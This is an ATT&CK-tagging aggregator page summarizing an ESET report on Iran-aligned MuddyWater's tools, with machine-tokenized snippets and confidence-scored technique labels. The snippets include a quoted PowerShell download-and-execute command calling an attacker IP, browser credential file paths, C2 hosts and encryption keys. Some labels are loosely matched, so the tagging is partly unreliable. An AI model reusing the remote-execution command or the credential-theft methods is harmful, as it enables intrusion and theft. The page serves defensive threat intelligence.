TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

ESET WeLiveSecurity

MuddyWater: Snakes by the riverbank

2025-12-02 · Read original ↗

ATT&CK techniques detected

32 predictions
T1555.003Credentials from Web Browsers
100%
“< username > \ appdata \ local \ microsoft \ edge \ user data \ local state and c : \ users \ < username > \ appdata \ roaming \ opera software \ opera stable \ local state, respectively. firefox finally, to decrypt stored user credentials for mozilla firefox, blub parses the hos…”
T1555.003Credentials from Web Browsers
99%
“##3a8f00279792578. similar to ce - notes, lp - notes then stores the encrypted credentials in a local file – in this case c : \ users \ public \ downloads \ lp - notes. txt. as neither of these components have the capability to exfiltrate data, another component presumably handle…”
T1059.001PowerShell
99%
“victim in saudi arabia by deploying a batch script that downloaded a powershell - based backdoor, which was used to download and execute arbitrary payloads and subsequently to remove the initial payload from disk. the group conducted a campaign in january and february 2025 that w…”
T1555.003Credentials from Web Browsers
99%
“key from c : \ users \ < username > \ appdata \ local \ google \ chrome \ user data \ local state. this key is used to encrypt sensitive data stored by chrome, such as passwords or cookies, and it is protected by the data protection api ( dpapi ) so that it can only be decrypted …”
T1555.003Credentials from Web Browsers
99%
“file. note that blub checks for running processes associated with security solutions before executing its malicious payload, focusing on the combination of afwserv. exe ( avast firewall ) and avastsvc. exe ( avast antivirus ) processes. if afwserv. exe is detected running ( but n…”
T1547.001Registry Run Keys / Startup Folder
98%
“been easily implemented on the server side : - [ > ] process : aciseagent. exe ~ ~ > ( cisco umbrella roaming security ) - - > ( security dns ) found! - [ > ] process : acnamagent. exe ~ ~ > ( absolute persistence ) - - > ( asset management ) found! - [ > ] process : acnamlogonag…”
T1071.001Web Protocols
97%
“with the winhttp _ flag _ secure flag configured to use ssl / tls. two c & c servers have been observed : processplanet [. ] org and 35. 175. 224 [. ] 64. both directions of communication aes - cbc encrypt the data, using the cng api with the key ( used across samples ) 060810104…”
T1555.003Credentials from Web Browsers
95%
“##shell \ v1. 0 \ powershell. exe " ( invoke - webrequest - usedefaultcredentials - usebasicparsing - uri http : / / 206. 71. 149 [. ] 51 : 443 / 57576? filter _ relational _ operator _ 2 = 60169 ). content | invoke - expression both versions of the browser - data stealer attempt…”
T1219Remote Access Tools
87%
“muddywater. this assessment is based on the initial access method and the subsequent delivery of malicious tools – generally via spearphishing emails that contain links to download rmm software. ttps muddywater operators continue to rely on predictable and script - based backdoor…”
T1566.002Spearphishing Link
72%
“of downloaders that leverage legitimate cloud services for c & c communication. we have previously observed lyceum targeting multiple israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector. during the campaign …”
T1003OS Credential Dumping
72%
“##s credential stealers ( ce ‑ notes and lp ‑ notes ) and reverse tunneling tools ( go ‑ socks5 ), long a favorite of muddywater operators. although this is our first public blogpost covering muddywater, eset researchers have been tracking the group for several years and have doc…”
T1588.002Tool
70%
“. the campaign outlined in this publication shows what, for muddywater, seems to be an unprecedented advancement in toolset and technical execution. victimology as previously mentioned, during this campaign, muddywater primarily targeted organizations in israel, but also one in e…”
T1204.002Malicious File
70%
“muddywater : snakes by the riverbank eset researchers have identified new muddywater activity primarily targeting organizations in israel, with one confirmed target in egypt. muddywater, also referred to as mango sandstorm or ta450, is an iran - aligned cyberespionage group known…”
T1041Exfiltration Over C2 Channel
70%
“the winhttpopen api. - the connection, send, receive, and response timeouts are set to 30 seconds. - default sleep time between consecutive connection attempts is 60 seconds. this value can be configured by command id 700. - upon failure, connection attempts are retried up to 10 …”
T1055.001Dynamic-link Library Injection
68%
“systems. we have observed muddyviper only in memory, loaded by fooder, which might be the reason there is no obfuscation or string encryption. as is typical for muddywater, muddyviper sends extremely verbose and frequent status messages to its c & c server throughout its executio…”
T1071.001Web Protocols
66%
“, visit the eset threat intelligence page. iocs files network mitre att & ck techniques this table was built using version 17 of the mitre att & ck framework.”
T1620Reflective Code Loading
63%
“- blub, a browser - data stealer, and - several go ‑ socks5 reverse tunnels. fooder loader fooder is a 64 - bit c / c + + loader designed to decrypt and then reflectively load the embedded payload ( as illustrated in figure 1 ), with muddyviper being the most frequently observed …”
T1056.002GUI Input Capture
60%
“. exe lp - notes credential stealer lp - notes is a c / c + + windows credential stealer with the same design as the ce - notes browser - data stealer. following the same naming convention as in the case of ce - notes, we named the stealer lp - notes based on the local file it us…”
T1027Obfuscated Files or Information
57%
“the process ( via the impersonateloggedonuser api ) ; only then does lp - notes activate its malicious payload. lp - notes employs several simple obfuscation techniques, including a custom, addition - based routine for string decryption. figure 5 shows the function that decrypts …”
T1219Remote Access Tools
57%
“of downloaders that leverage legitimate cloud services for c & c communication. we have previously observed lyceum targeting multiple israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector. during the campaign …”
T1090.001Internal Proxy
53%
“##immi34 = build - buildmode = exe build - compiler = gc build - ldflags = " - w - s " build cgo _ enabled = 1 build cgo _ cflags = build cgo _ cppflags = build cgo _ cxxflags = build cgo _ ldflags = build goarch = amd64 build goos = windows build goamd64 = v1 figure 9. build con…”
T1059.001PowerShell
50%
“the winhttpopen api. - the connection, send, receive, and response timeouts are set to 30 seconds. - default sleep time between consecutive connection attempts is 60 seconds. this value can be configured by command id 700. - upon failure, connection attempts are retried up to 10 …”
T1134.001Token Impersonation/Theft
48%
“we have observed one instance ( sha - 1 : 76632910cf67697bf5d7285fae38bfcf438ec082 ) of the component launching fooder. deployed under the name % userprofile % \ downloads \ osupdater. exe, the launcher expects a process id as a command line argument. once executed, it attempts t…”
T1055.001Dynamic-link Library Injection
46%
“##g api with the key 9262a37df166ac1d5f582aac79f54ccb47623bfd9ba001228d284ae13a08f52f and the iv 4103a09887b82ffd56a93bb431805224. then the encrypted data is stored on disk in c : \ users \ public \ downloads \ ce - notes. txt for later retrieval ( probably via an rmm tool, since…”
T1003.001LSASS Memory
45%
“##s credential stealers ( ce ‑ notes and lp ‑ notes ) and reverse tunneling tools ( go ‑ socks5 ), long a favorite of muddywater operators. although this is our first public blogpost covering muddywater, eset researchers have been tracking the group for several years and have doc…”
T1003.001LSASS Memory
43%
“##s between several of the newly documented tools and those we previously attributed to muddywater : - lp - notes, a new credential stealer, has the same design as ce - notes, a browser - data stealer, that we previously associated with muddywater. during this campaign, we also o…”
T1056.002GUI Input Capture
41%
“tools share is that they attempt to steal user credentials by opening a fake windows security dialog. toolset in this blogpost, we document previously unknown, custom tools used by muddywater : - fooder loader – a newly identified loader that loads the muddyviper backdoor into me…”
T1027.007Dynamic API Resolution
41%
“the process ( via the impersonateloggedonuser api ) ; only then does lp - notes activate its malicious payload. lp - notes employs several simple obfuscation techniques, including a custom, addition - based routine for string decryption. figure 5 shows the function that decrypts …”
T1056.002GUI Input Capture
36%
“hiding direct references to the api functions from pseudocode view ( see figure 7 ). capabilities in an endless loop, lp - notes displays a fake windows security dialog prompting the victim to enter their windows username and password, as shown in figure 8 ( via the creduipromptf…”
T1090Proxy
34%
“##immi34 = build - buildmode = exe build - compiler = gc build - ldflags = " - w - s " build cgo _ enabled = 1 build cgo _ cflags = build cgo _ cppflags = build cgo _ cxxflags = build cgo _ ldflags = build goarch = amd64 build goos = windows build goamd64 = v1 figure 9. build con…”
T1055.012Process Hollowing
33%
“we have observed one instance ( sha - 1 : 76632910cf67697bf5d7285fae38bfcf438ec082 ) of the component launching fooder. deployed under the name % userprofile % \ downloads \ osupdater. exe, the launcher expects a process id as a command line argument. once executed, it attempts t…”
T1555.003Credentials from Web Browsers
32%
“tools share is that they attempt to steal user credentials by opening a fake windows security dialog. toolset in this blogpost, we document previously unknown, custom tools used by muddywater : - fooder loader – a newly identified loader that loads the muddyviper backdoor into me…”

Summary

MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook